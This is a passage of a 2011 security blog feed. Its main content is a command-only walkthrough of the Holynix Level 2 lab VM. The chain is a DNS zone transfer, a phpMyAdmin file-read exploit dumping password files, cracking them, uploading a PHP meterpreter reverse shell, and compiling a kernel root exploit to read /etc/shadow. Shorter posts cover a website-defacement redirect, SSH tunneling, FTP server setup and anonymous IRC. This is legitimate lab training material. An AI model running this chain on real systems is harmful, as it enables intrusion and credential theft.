us -H -msf -Iv 192.168.1.88 -p 1-65535 &amp;&amp; us -H -mU -Iv 192.168.1.88 -p 1-65535&lt;br /&gt;
nmap -p 1-65535 -T4 -A -v 192.168.1.88&lt;br /&gt;
firefox 192.168.1.88&lt;br /&gt;
echo www.zincftp.com 192.168.1.88 &gt;&gt; /etc/hosts&lt;br /&gt;
cat /etc/hosts&lt;br /&gt;
echo nameserver 192.168.1.88 &gt; /etc/resolv.conf&lt;br /&gt;
cat /etc/resolv.conf&lt;br /&gt;
dig zincftp.com @192.168.1.88&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88&lt;br /&gt;
ifconfig eth0 192.168.1.89&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq &gt; /tmp/hosts&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq &gt; /tmp/users&lt;br /&gt;
dig AXFR zincftp.com @192.168.1.88 | grep -v 192.168.1.88 | grep -v ";"&lt;br /&gt;
BackTrack -&gt; Vulnerability Assessment -&gt; Web Application  Assessment -&gt; Web Application Fuzzers -&gt; DirBuster   #  http://192.168.1.88  directory-list-2.3-medium.txt&lt;br /&gt;
ifconfig eth0 192.168.1.34&lt;br /&gt;
BackTrack -&gt; Vulnerability Assessment -&gt; Web Application  Assessment -&gt; Web Application Fuzzers -&gt; DirBuster   #  http://192.168.1.88  directory-list-2.3-medium.txt&lt;br /&gt;
Right Click -&gt; Open In Broswer   # /phpMyAdmin/   /setup_guide/&lt;br /&gt;
phpMyAdmin -&gt; zincftp_data -&gt; browse   # shanover &amp; lbaumann&lt;br /&gt;
phpMyAdmin -&gt; home -&gt; changelog&lt;br /&gt;
cd /pentest/exploits/exploitdb&lt;br /&gt;
grep -i phpmyadmin files.csv&lt;br /&gt;
perl platforms/php/webapps/1244.pl&lt;br /&gt;
perl platforms/php/etc/passwd&lt;br /&gt;
perl platforms/php/etc/passwd | grep /bin/bash | cut -d ":" -f1&lt;br /&gt;
perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/  ../../../../../etc/passwd | grep /bin/bash | cut -d ":" -f1 &gt;  /tmp/sshUsers&lt;br /&gt;
firefox http://192.168.1.88/setup_guide/ -&gt; todo&lt;br /&gt;
perl platforms/php/etc/pure-ftpd/pureftpd.passwd&lt;br /&gt;
perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/&lt;br /&gt;
perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/ &gt; /tmp/ftpUsers&lt;br /&gt;
&lt;br /&gt;
cd /pentest/passwords/john&lt;br /&gt;
find / -name password.lst&lt;br /&gt;
wc -l /pentest/passwords/wordlists/darkc0de.lst&lt;br /&gt;
wc -l /opt/framework3/msf3/data/john/wordlists/password.lst   # Much smaller, therefore quicker!&lt;br /&gt;
./john --wordlist=/opt/framework3/msf3/data/john/wordlists/password.lst /tmp/ftpUsers   # --rules&lt;br /&gt;
ftp 192.168.1.88   # dhammond jack-in-the-box&lt;br /&gt;
ls&lt;br /&gt;
cd web&lt;br /&gt;
&lt;br /&gt;
echo "&lt;? echo \"Hello World\"; ?&gt;" &gt; test.php &lt;br /&gt;
&lt;br /&gt;
put test.php&lt;br /&gt;
&lt;br /&gt;
curl dhammond.zincftp.com/test.php&lt;br /&gt;
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw &gt; evil.php&lt;br /&gt;
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E&lt;br /&gt;
&lt;br /&gt;
put evil.php&lt;br /&gt;
&lt;br /&gt;
curl dhammond.zincftp.com/evil.php &amp;&amp; exit&lt;br /&gt;
&lt;br /&gt;
sysinfo&lt;br /&gt;
shell&lt;br /&gt;
id&lt;br /&gt;
python -c 'import pty; pty.spawn("/bin/sh")'&lt;br /&gt;
ls -lAhR /home&lt;br /&gt;
cat /home/amckinley/my_key.eml   #first and last name, all lower case, followed by 2ba9&lt;br /&gt;
grep amckinley /etc/passwd    # Agustin Mckinley&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
quit&lt;br /&gt;
ssh amckinley@zincftp.com   # agustinmckinley2ba9&lt;br /&gt;
id&lt;br /&gt;
uname -a&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
cd /pentest/explotis/exploitdb&lt;br /&gt;
grep -i "linux kernel 2.6"  files.csv | grep -i root   #| uniq   # grep -i dos&lt;br /&gt;
cp platforms/linux/local/5092.c /var/www/exploit.c&lt;br /&gt;
/etc/init.d/apache2 start&lt;br /&gt;
ls -l /var/www/exploit.c&lt;br /&gt;
head -n 20 /var/www/exploit.c   # Check to make sure vaild code&lt;br /&gt;
&lt;br /&gt;
cd /tmp&lt;br /&gt;
ls -la&lt;br /&gt;
wget 192.168.1.34/exploit.c&lt;br /&gt;
gcc exploit.c -o root&lt;br /&gt;
ls -la&lt;br /&gt;
./root&lt;br /&gt;
id &amp;&amp; ifconfig &amp;&amp; uname -a &amp;&amp; cat /etc/shadow &amp;&amp; ls -lahR /root&lt;br /&gt;
cd /var/www&lt;br /&gt;
find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect"&lt;br /&gt;
cat dev/dbconn.php&lt;br /&gt;
cat htdocs/dbconn.php&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).&lt;br /&gt;
- The user names which were collected were not essential for this, however this was included to demonstrate the techniques.&lt;br /&gt;
- On reflection, DirBuster was only used to visible compare the HTTP codes, depending on the IP address used. This could of been achived manually as checking "/phpMyAdmin/" is highly recommend (along with "/robots.txt" for example). Then by using the phpMyAdmin exploit, viewing the file "/etc/apache2/sites-enabled/000-default" would have revealed "/setup_guides/".&lt;br /&gt;
- Some mistakes in the video are more obvious.&lt;br /&gt;
- This video has been "over-edited" more than most of the other videos as it was made to fix the length of music.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3994343510353423320?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3994343510353423320'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3994343510353423320'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-holynix-level-2.html' title='HOWTO : Holynix - Level 2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5529886530342511621</id><published>2011-09-11T20:52:00.002+08:00</published><updated>2011-09-16T17:07:43.522+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='deface'/><title type='text'>HOWTO : Deface a website fast</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any website without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : pr0xzy&lt;br /&gt;
&lt;br /&gt;
This is not my work.  I re-post it here for educational purpose only.&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="640" height="510" src="http://www.youtube.com/embed/neU_4VJdIJ8?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
Command&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&amp;lt;meta http-equiv="refresh" content="0; URL=http://some.domain.com"/&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5529886530342511621?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5529886530342511621'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5529886530342511621'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-deface-website-fast.html' title='HOWTO : Deface a website fast'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/neU_4VJdIJ8/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3567092148496608236</id><published>2011-09-04T08:57:00.008+08:00</published><updated>2011-09-06T00:47:34.468+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SSH'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : SSH Tunneling - Remote Port Forwarding</title><content type='html'>&lt;code&gt;&lt;b&gt;WARNING : Do NOT attack any computer or network without authorization or you will be put into jail.&lt;/b&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Scenario :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Victim Machine A and B (both are Windows XP machines) are in the same internal network.  Victim A is connected to the internet while B is not.&lt;br /&gt;
&lt;br /&gt;
Attacker gets the remote shell of A in the first hand and then further gets the remote shell of B by the SSH tunneling technique.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Background Music :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Infected Mushroom 09 Franks (by Offensive Security)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Operating Systems on VirtualBox :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(1) Back|Track 5 R1&lt;br /&gt;
(2) Windows XP SP1 (Traditional Chinese)&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="750" height="510" src="http://www.youtube.com/embed/n6YfEchgW7Q?hd=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3567092148496608236?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3567092148496608236'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3567092148496608236'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-ssh-tunneling-remote-port.html' title='HOWTO : SSH Tunneling - Remote Port Forwarding'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/n6YfEchgW7Q/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5253198380993823120</id><published>2011-09-03T00:15:00.004+08:00</published><updated>2011-09-04T18:42:48.729+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SSH'/><category scheme='http://www.blogger.com/atom/ns#' term='Filezilla'/><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>HOWTO : SSH Tunneling with Dynamic Port Forwarding</title><content type='html'>To ensure your connection under encrypted without changing the installation or configuration of application softwares.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the following file on the SSH server (any computer that will be running 24/7, the most perfect) on any computer outside your network.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get install openssh-server&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART I - FIREFOX&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Firefox and select "&lt;code&gt;Edit&lt;/code&gt;" -- "&lt;code&gt;Preference&lt;/code&gt;".  "&lt;code&gt;Advanced&lt;/code&gt;" -- "&lt;code&gt;Network&lt;/code&gt;" -- "&lt;code&gt;Connection&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Manual Proxy setting&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;SOCKS Host : localhost&lt;br /&gt;
Port : 1080&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go the the address entry field.  &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;about:config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
search for "&lt;code&gt;network.proxy.socks_remote_dns&lt;/code&gt;" and double click it to set it to "&lt;code&gt;true&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Close the Firefox.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II - FILEZILLA&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Filezilla.  "&lt;code&gt;Edit&lt;/code&gt;" -- "&lt;code&gt;Settings&lt;/code&gt;" -- "&lt;code&gt;Common Proxy&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;SOCKS 5&lt;/code&gt;"&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Proxy Host : localhost&lt;br /&gt;
Proxy Port : 1080&lt;br /&gt;
Proxy User : &amp;lt;Your username&amp;gt;&lt;br /&gt;
Proxy Password : &amp;lt;Your password&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART III - FINAL&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open a terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ssh -C -D 1080 &amp;lt;SSH Server IP or Hostname&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Enter your password.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Remarks :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Make sure the terminal window keeping open.  Otherwise, the SSH tunneling will quit.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Restart Firefox and surf the internet.  And use Filezilla to download or upload files.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;br /&gt;
&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5253198380993823120?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5253198380993823120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5253198380993823120'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-ssh-tunneling-with-dynamic-port.html' title='HOWTO : SSH Tunneling with Dynamic Port Forwarding'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-6922938753863224993</id><published>2011-08-23T19:22:00.002+08:00</published><updated>2011-08-23T19:47:10.222+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='atftpd'/><category scheme='http://www.blogger.com/atom/ns#' term='pure-ftpd'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Pure-ftpd and atftpd on Back|Track 5</title><content type='html'>You may use FTP and/or atftpd services on Back|Track 5.  The following tutorial is showing you how to set it up on Back|Track 5.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART I - PURE-FTPD&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install pure-ftpd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /etc/pure-ftpd/conf/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo ,21 &gt; Bind&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you are behind NAT, you should set the following.  The IP of your machine is suppose to be 192.168.1.1 and the passive ports are between 5000 and 5600.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo 192.168.1.1 &gt; ForcePassiveIP&lt;br /&gt;
echo 5000 5600 &gt; PassivePortRange&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The following settings are for security only.  It is optional :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo yes &gt; ChrootEveryone&lt;br /&gt;
echo yes &gt; ProhibitDotFilesRead&lt;br /&gt;
echo yes &gt; ProhibitDotFilesWrite&lt;br /&gt;
echo yes &gt; NoChmod&lt;br /&gt;
echo yes &gt; BrokenClientsCompatibility&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The following settings are for preventing abuse :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo 4 &gt; MaxClientsPerIP&lt;br /&gt;
echo 20 &gt; MaxClientsNumber&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To use PureDB authentication :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo no &gt; PAMAuthentication&lt;br /&gt;
echo no &gt; UnixAuthentication&lt;br /&gt;
echo /etc/pure-ftpd/pureftpd.pdb &gt; PureDB&lt;br /&gt;
ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50pure&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 7 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;groupadd -g 2001 ftpgroup&lt;br /&gt;
useradd -u 2001 -s /bin/false -d /bin/null -c "pureftpd user" -g ftpgroup ftpuser&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 8 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Create a virtual user - samiux :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;pure-pw useradd samiux -u ftpuser -d /ftphome/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;pure-pw mkdb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*** "&lt;code&gt;pure-pw mkdb&lt;/code&gt;" should be issued when a new user is added.&lt;br /&gt;
&lt;br /&gt;
*** Make sure you have a directory /ftphome.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 9 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add TLS/SSL support and generate a private certificate :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /etc/pure-ftpd/conf/&lt;br /&gt;
echo 1 &gt; TLS&lt;br /&gt;
openssl req -x509 -nodes -newkey rsa:1024 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem&lt;br /&gt;
&lt;br /&gt;
chmod 600 /etc/ssl/private/pure-ftpd.pem&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Restart the pure-ftpd (or reboot your system) :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/pure-ftpd restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Remarks :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
I encounter a problem when login to the pure-ftp as invalid username and password.  I reboot the system and the problem gone.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II - ATFTPD&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cp /etc/default/atftpd /etc/default/atftpd-old&lt;br /&gt;
&lt;br /&gt;
nano /etc/default/atftpd&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the content as is :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;USE_INETD=false&lt;br /&gt;
OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --maxthread 100 --verbose=5 --daemon --port 69 /tftpboot"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step c :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/atftpd restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*** Make sure you have a directory /tftpboot.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-6922938753863224993?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6922938753863224993'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6922938753863224993'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/08/howto-pure-ftpd-and-atftpd-on-backtrack.html' title='HOWTO : Pure-ftpd and atftpd on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-6325709381481148180</id><published>2011-08-04T15:34:00.006+08:00</published><updated>2011-08-21T12:27:12.083+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='znc'/><category scheme='http://www.blogger.com/atom/ns#' term='my-bnc.net'/><category scheme='http://www.blogger.com/atom/ns#' term='irc'/><category scheme='http://www.blogger.com/atom/ns#' term='xchat'/><title type='text'>HOWTO : Anonymous in chat.freenode.net with XChat</title><content type='html'>IRC will display your IP address to other users that online.  However, you can hide it by using IRC Proxy or Bouncer.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART I - MY-BNC.NET&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
First of all, go to &lt;a href="http://my-bnc.net/"&gt;My-BNC.net&lt;/a&gt; to register an account.  For example, the username is &lt;code&gt;android&lt;/code&gt; and password is &lt;code&gt;androidpass&lt;/code&gt;.  Then, login with your username and password that registered before.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go the the menu on the browser, choose "&lt;code&gt;Setting&lt;/code&gt;" to setup your account.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;(a) Server setting&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ssl = on &lt;br /&gt;
port = 7000&lt;br /&gt;
server = chat.freenode.net&lt;br /&gt;
password = &amp;lt;Do not require&amp;gt;&lt;br /&gt;
vhost = my-bnc.net&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
perform 1 = JOIN #&amp;lt;Your Channel&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;(b) User setting&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Realname = My-BNC User&lt;br /&gt;
Nickname = android&lt;br /&gt;
Password = androidpass&lt;br /&gt;
&lt;br /&gt;
Profile = Private&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;(c) Services Authorisation &amp; NickServ&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Auth name = android&lt;br /&gt;
Auth password = androidpass&lt;br /&gt;
Auto-auth = on&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II - XCHAT AND ZNC&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get install znc xchat&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;znc --makeconf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;[ ** ] Building new config&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] First lets start with some global settings...&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] What port would you like ZNC to listen on? (1 to 65535): 6697&lt;br /&gt;
[ ?? ] Would you like ZNC to listen using SSL? (yes/no) [no]: yes&lt;br /&gt;
[ ** ] Unable to locate pem file: [/home/samiux/.znc/znc.pem]&lt;br /&gt;
[ ?? ] Would you like to create a new pem file now? (yes/no) [yes]: &lt;br /&gt;
[ ?? ] hostname of your shell (including the '.com' portion): irc.my-bnc.net&lt;br /&gt;
[ ok ] Writing Pem file [/home/samiux/.znc/znc.pem]... &lt;br /&gt;
[ ?? ] Would you like ZNC to listen using ipv6? (yes/no) [no]: &lt;br /&gt;
[ ?? ] Listen Host (Blank for all ips): &lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] -- Global Modules --&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Do you want to load any global modules? (yes/no): yes&lt;br /&gt;
&lt;br /&gt;
[ ** ] And 10 other (uncommon) modules. You can enable those later.&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Load global module &amp;lt;partyline&amp;gt;? (yes/no) [no]: &lt;br /&gt;
[ ?? ] Load global module &amp;lt;webadmin&amp;gt;? (yes/no) [no]: yes&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] Now we need to setup a user...&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Username (AlphaNumeric): android&lt;br /&gt;
[ ?? ] Enter Password: androidpass&lt;br /&gt;
[ ?? ] Confirm Password: androidpass&lt;br /&gt;
[ ?? ] Would you like this user to be an admin? (yes/no) [yes]: &lt;br /&gt;
[ ?? ] Nick [android]: &lt;br /&gt;
[ ?? ] Alt Nick [android_]: &lt;br /&gt;
[ ?? ] Ident [android]: &lt;br /&gt;
[ ?? ] Real Name [Got ZNC?]: &lt;br /&gt;
[ ?? ] VHost (optional): &lt;br /&gt;
[ ?? ] Number of lines to buffer per channel [50]: 500&lt;br /&gt;
[ ?? ] Would you like to keep buffers after replay? (yes/no) [no]: &lt;br /&gt;
[ ?? ] Default channel modes [+stn]: &lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] -- User Modules --&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Do you want to automatically load any user modules for this user? (yes/no): yes&lt;br /&gt;
&lt;br /&gt;
[ ** ] And 33 other (uncommon) modules. You can enable those later.&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Load module &amp;lt;admin&amp;gt;? (yes/no) [no]: yes&lt;br /&gt;
[ ?? ] Load module &amp;lt;chansaver&amp;gt;? (yes/no) [no]: yes&lt;br /&gt;
[ ?? ] Load module &amp;lt;keepnick&amp;gt;? (yes/no) [no]: yes&lt;br /&gt;
[ ?? ] Load module &amp;lt;kickrejoin&amp;gt;? (yes/no) [no]: &lt;br /&gt;
[ ?? ] Load module &amp;lt;nickserv&amp;gt;? (yes/no) [no]: &lt;br /&gt;
[ ?? ] Load module &amp;lt;perform&amp;gt;? (yes/no) [no]: &lt;br /&gt;
